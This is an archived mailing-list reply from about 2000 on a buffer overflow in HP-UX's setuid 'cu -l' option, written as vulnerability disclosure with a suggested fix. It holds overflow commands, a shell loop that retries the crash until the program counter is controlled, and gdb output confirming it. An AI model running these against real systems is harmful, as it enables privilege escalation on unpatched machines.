Re: HPUX cu -l option buffer overflow vulnerabilit

["J.A. Gutierrez" <spd () GTC1 CPS UNIZAR ES>]

> =======================================================
>     HPUX cu -l option buffer overflow vulnerability
> =======================================================
>
> Date: 02/11/2000
> Tested on HP-UX B.11.00
>
> $ cu -l `perl -e 'printf "A" x 9777'`

    It's exploitable on 10.20 (trivial exploit: you don't even
    have to find return address, the buffer itself gets executed)

    HP-UX 9.x 68k seems to be vulnerable too, but I don't have
    the exploit.

    On HP-UX 11 you need PA-RISC 1.1 shell code, and the PC
    you get with

    ./cu -l `perl -e 'printf "A" x 5667'`

    changes randomly (why?). Eventually you get a pointer to your
    data:


$ while :
do
./cu -l `perl -e 'printf "A" x 5667'`
if file core | egrep -v SIGILL
then
    break
fi
done

[...]
Illegal instruction(coredump)
Connect failed: Requested device/system name not known

Illegal instruction(coredump)
Memory fault(coredump)
core:           core file from 'cu' - received SIGSEGV


$  gdb cu core
[...]
Core was generated by `cu'.
Program terminated with signal 11, Segmentation fault.
Unable to find __dld_flags symbol in object file.

#0  0x7f7eb010 in ?? ()
#0  0x7f7eb010 in ?? ()
(gdb) print {char *} 0x7f7eb010
$1 = 0x41414141 <Address 0x41414141 out of bounds>
(gdb)



    Fix: chmod -s /bin/cu

--
finger spd () gtc1 cps unizar es for PGP       /              So be easy and free
.mailcap tip of the day:                   /      when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null       /            (the pogues)